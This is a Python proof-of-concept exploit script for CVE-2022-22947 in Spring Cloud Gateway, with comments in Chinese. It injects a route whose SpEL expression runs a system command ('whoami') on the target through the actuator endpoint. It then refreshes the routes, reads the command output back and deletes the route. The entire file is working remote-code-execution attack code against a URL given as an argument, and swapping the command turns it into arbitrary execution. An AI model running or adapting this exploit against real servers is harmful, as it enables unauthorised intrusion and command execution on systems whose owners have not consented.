import requests
import urllib3
import json
import re
import sys
urllib3.disable_warnings()

a='''
CVE-2022-22947_POC  CVE-2022-22947_POC  CVE-2022-22947_POC
CVE-2022-22947_POC  CVE-2022-22947_POC  CVE-2022-22947_POC
'''

uri_check='/actuator/gateway/routes/code'
uri_refresh='/actuator/gateway/refresh'

#添加恶意路由的headers
headers_add = {
    'Accept-Encoding': 'gzip, deflate',
    'Accept': '*/*',
    'Accept-Language': 'en',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
    'Content-Type': 'application/json'
}
#refresh的headers
headers_refresh = {
    'Accept-Encoding': 'gzip, deflate',
    'Accept': '*/*',
    'Accept-Language': 'en',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded'
}

#参考y4er的文章
payload = {
    "id": "code",
    "filters": [
        {
            "name": "AddResponseHeader",
            "args": {
                "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}",
                "name": "cmd123"
            }
        }
    ],
    "uri": "http://aaa.com",
    "order": 0
}

#注入路由
def zhuru(url):
    try:
        zr = url+uri_check
        req_zhuru = requests.post(url=zr,headers=headers_add,data = json.dumps(payload, ensure_ascii = False),json=json,verify=False,timeout=2)
        code_zhuru = req_zhuru.status_code
        if code_zhuru ==200 or code_zhuru ==201:
            print('[+]注入路由成功,漏洞存在')
        else:
            print('[-]注入路由失败，漏洞不存在')
            print(code_zhuru)
    except requests.exceptions.RequestException:
        print('[-]注入路由超时,漏洞检测超时')
    except:
        print('[-]注入路由异常')   

#刷新路由
def refresh(url):
    try:
        rf=url+uri_refresh
        req_refresh =requests.post(url=rf,headers=headers_refresh,verify=False,timeout=1)
        code_refresh=req_refresh.status_code
        if code_refresh==200:
            print('[+]刷新路由成功')
        else:
            print('[-]刷新路由失败')
            # print(code_refresh)
            # print(code_refresh)
    except requests.exceptions.RequestException:
        print('[-]刷新路由超时')
    except:
        print('[-]刷新路由异常')
 
#回显
def huixian(url):
    try:
        req_huixian=requests.get(url=url+uri_check,headers=headers_add,verify=False,timeout=1)
        req_huixian_text=req_huixian.text
        req_huixian_code =req_huixian.status_code
        if req_huixian_code==200:
            req_huixian_text = req_huixian_text.replace("'", '')
            req_huixian_text = req_huixian_text.replace(" ", '')
            req_huixian_text = req_huixian_text.replace("\\n", '')
            req_huixian_re = re.compile(r'AddResponseHeaderResult=(.*?)],')
            req_huixian_re_1 = req_huixian_re.findall(req_huixian_text, re.S)
            huixian =req_huixian_re_1[0]
            print(f'[+]获取回显命令成功：{huixian}')
            # print(req_huixian_text)
        else:
            # print(req_huixian_code)
            print('[-]获取回显失败，请手动测试')
    except requests.exceptions.RequestException:
        print('[-]获取回显超时')
    except:
        print('[-]获取回显异常，请手动测试')

#删除命令注入
def del_rce_in(url):
    all=url+uri_check
    try:
        req =requests.delete(url=all,verify=False,timeout=2)
        code = req.status_code
        if code ==200:
            print('[+]删除注入路由成功')
        else:
            print('[-]删除注入路由失败')
    except requests.exceptions.RequestException:
        print('[-]删除注入路由超时')
    except:
        print('[-]删除注入路由异常')

#检测漏洞
def poc(url):
    zhuru(url)
    refresh(url)
    huixian(url)
    del_rce_in(url)
    refresh(url)

if __name__ == '__main__' :
    print(a)
    url = sys.argv[1]
    poc(url)
